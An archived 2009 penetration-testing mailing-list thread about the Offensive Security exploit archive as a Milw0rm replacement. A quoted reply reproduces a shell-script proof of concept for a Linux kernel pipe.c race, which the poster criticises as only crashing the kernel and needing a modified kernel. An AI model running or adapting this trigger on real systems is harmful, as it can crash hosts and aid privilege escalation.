Home page logo
/

pen-test logo Penetration Testing mailing list archives

Re: Possible Milw0rm replacement?
From: "Kevin L. Shaw, CISSP, GCIH" <kshaw () eeenterprisesinc com>
Date: Tue, 17 Nov 2009 09:41:50 -0500

Siim:

One thing I've noticed from the group at Offensive Security is that they never "give" you anything except a means to start down a path. Their motto is "Try Harder" and in fact it is made obvious that any exploit you find in a repository should be examined and adjusted to serve your purpose. They know many of the POCs are not going to fly and leave it up to you to figure it out or break it down better like you did. I'm just thankful they brought something to the community since I don't have the capability to create these on my own and still complete my day job. I appreciate you pointing all that out because it's more for me to figure out and learn too.

Regards,
Kev


Siim Põder wrote:
Hi

Tom Green wrote:
http://exploits.offensive-security.com/

Just that their review process seems to suck?

"Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability":
while : ; do
   { echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
   PID=$!
   OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
        { read PID REST ; echo $PID; } )
   OUT="${OUT%% *}"
   DELAY=$((RANDOM * 1000 / 32768))
   usleep $((DELAY * 1000 + RANDOM % 1000 ))
   echo n > /proc/$OUT/fd/1                 # Trigger defect
done

Not only would that just OOPS the kernel and kill the process, it also
needs a MODIFIED kernel (sleep(n) added to) to even trigger that. The
discoverer himself made that note when he posted the shellscript.

So on first glance it leaves a very professional impression of the site ;)

Siim

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified.
http://www.iacertification.org
------------------------------------------------------------------------




------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified.
http://www.iacertification.org
------------------------------------------------------------------------


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]